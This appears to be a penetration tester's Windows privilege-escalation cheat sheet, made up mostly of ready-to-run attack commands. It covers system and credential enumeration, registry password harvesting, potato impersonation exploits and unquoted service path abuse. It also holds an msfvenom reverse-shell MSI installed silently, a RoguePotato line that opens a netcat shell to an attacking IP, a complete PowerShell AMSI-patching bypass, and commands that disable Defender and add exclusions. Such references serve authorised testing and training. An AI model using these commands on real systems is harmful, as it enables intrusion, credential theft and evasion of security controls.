Windows
System enumeration
hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # /B Matches the text pattern if it is at the beginning of a line.
wmic qfe # extract patches (KB), wmic = windows management instrumentation cmd line, qfe = quick fix engineering
wmic qfe get Caption,Description,HotFixID,InstalledOn # extract patches with these specifics columns
wmic logicaldisk
wmic logicaldisk get caption,description,providername # look if there is other existing drives
Users enumeration
whoami /all
net users
net user administrator
wmic useraccount list brief # includes SID
net localgroup
net localgroup administrators
Network enumeration
ipconfig
ipconfig /all
arp -a
route print
netstat -ano
# fport supports Windows NT4, Windows 2000 and Windows XP
# fport reports all open TCP/IP and UDP ports and maps them to the owning application.
Fport.exe /p
Antivirus and Firewall enumeration
sc query windefend # sc = service control, windefend is the default windows antivirus
sc queryex type= service # all the services running, search for AV such as sophos, avast...
netsh advfirewall firewall dump # modern command, show firewall state
netsh firewall show state # old comand
netsh firewall show config
Account lockout
PowerShell Enumeration
Tools
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Kernel Exploit
- https://github.com/SecWiki/windows-kernel-exploits
- https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
Password Hunting
Enumerate folders
tree /f /a # in users directory
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt *.conf* # search for file contents
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* # search filename
Unattend files
MSFPowerShell history
type C:\Users\theuser\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Unmounted volumes
Search registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
mRemoteNG
- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
HiveNightmare
- https://github.com/GossiTheDog/HiveNightmare
Stored credentials
WSL
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Registry
Autorun
Always Install Elevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$VPN LPORT=443 -f msi -o rev.msi
msiexec /quiet /qn /i C:\Windows\Tasks\rev.msi
Drivers
- the driver directory is often found under C:\Windows\System32\DRIVERS but sometimes in "C:\Program Files". Drivers are .inf filetype.
Compile C/C++ code on Windows: https://www.mingw-w64.org/
Impersonation Privileges
Restore Privileges
- This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
- https://github.com/itm4n/FullPowers
SeImpersonatePrivilege
-
https://jlajara.gitlab.io/Potatoes_Windows_Privesc
-
Sweet Potato to rule them all : https://github.com/CCob/SweetPotato
-
If the machine is < Windows 10 1809 < Windows Server 2019 : https://github.com/ohpe/juicy-potato/
- test for clsid : https://github.com/ohpe/juicy-potato/tree/master/CLSID
-
If the machine is >= Windows 10 1809 & Windows Server 2019 :
-
https://github.com/antonioCoco/RoguePotato
# On attacking machine
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
# On victim machine
.\RoguePotato.exe -r ATTACKING_IP -e "C:\Windows\Tasks\nc.exe ATTACKING_IP 1234 -e cmd.exe" -l 9999
- https://github.com/itm4n/PrintSpoofer
SeLoadDriver
- Explainations : https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- Walkthrough : https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system
- Load the vulnerable driver : https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
- Capcom.sys, a vulnerable driver : https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
- Exploit Capcom : https://github.com/tandasat/ExploitCapcom
Compile the files using Visual Studio. Release / x64 -> Build. Remove the include "stdafx.h" if error. You should modify the TCHAR CommandLine[] = TEXT("C:\Windows\system32\cmd.exe"); launched in the exploit first. Replace by a rev generated using msfvenom. Load then exploit the vulnerable driver.
./EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Users\svc-print\Capcom.sys
./ExploitCapcom.exe
Unquoted Service Paths
- When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
# find unquoted service
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# check if running as system or admin
sc qc <service_name>
# check path
icacls <service_path>
# After creating or replacing the binary by a malicious one
# if start type is Auto, you need SeShutdownPrivilege to reboot
shutdown /r /t 0
Localhost services
Chisel
- https://github.com/jpillora/chisel
Access localhost port 8888 on victim machine from attacking machine
./chisel_1.7.7_linux_amd64 server -p 9876 --reverse # attacking machine
./chisel_1.7.7_windows_amd64 client 10.10.14.20:9876 R:8888:127.0.0.1:8888 # victim machine
AMSI bypass
- https://badoption.eu/blog/2023/07/15/divideconqer.html
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$k = [Win32]
$a = "axmxsxix.xdxlxlx".Replace("x","")
$LoadLibrary = $k::LoadLibrary($a)
$b= "AxmxsxixSxcxaxnxBxuxfxfxexrx".Replace("x","")
$Address = $k::GetProcAddress($LoadLibrary, $b)
$p = 0
$k::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
$x = [System.Runtime.InteropServices.Marshal]
$x::Copy($Patch, 0, $Address, 6)
Add admin account Windows
Add exclusions
Set-MpPreference -DisableRealTimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning 1
Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
Set-MpPreference -ExclusionProcess "legit.txt","powershell.exe","msbuild.exe"
Bypass UAC
- https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
Enable RDP from CLI
- https://support.moonpoint.com/os/windows/software/remote-control/rdp/rdp-registry.php
net localgroup "Remote Desktop Users" /add pentest
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -ano | find "3389"
netsh firewall set portopening protocol = TCP port = 3389 name = "RDP" mode = ENABLE scope = CUSTOM $LHOST
rdesktop $IP -u pentest -p Pentest1!
Admin to System
- https://twitter.com/cyb3rops/status/1448208520680284164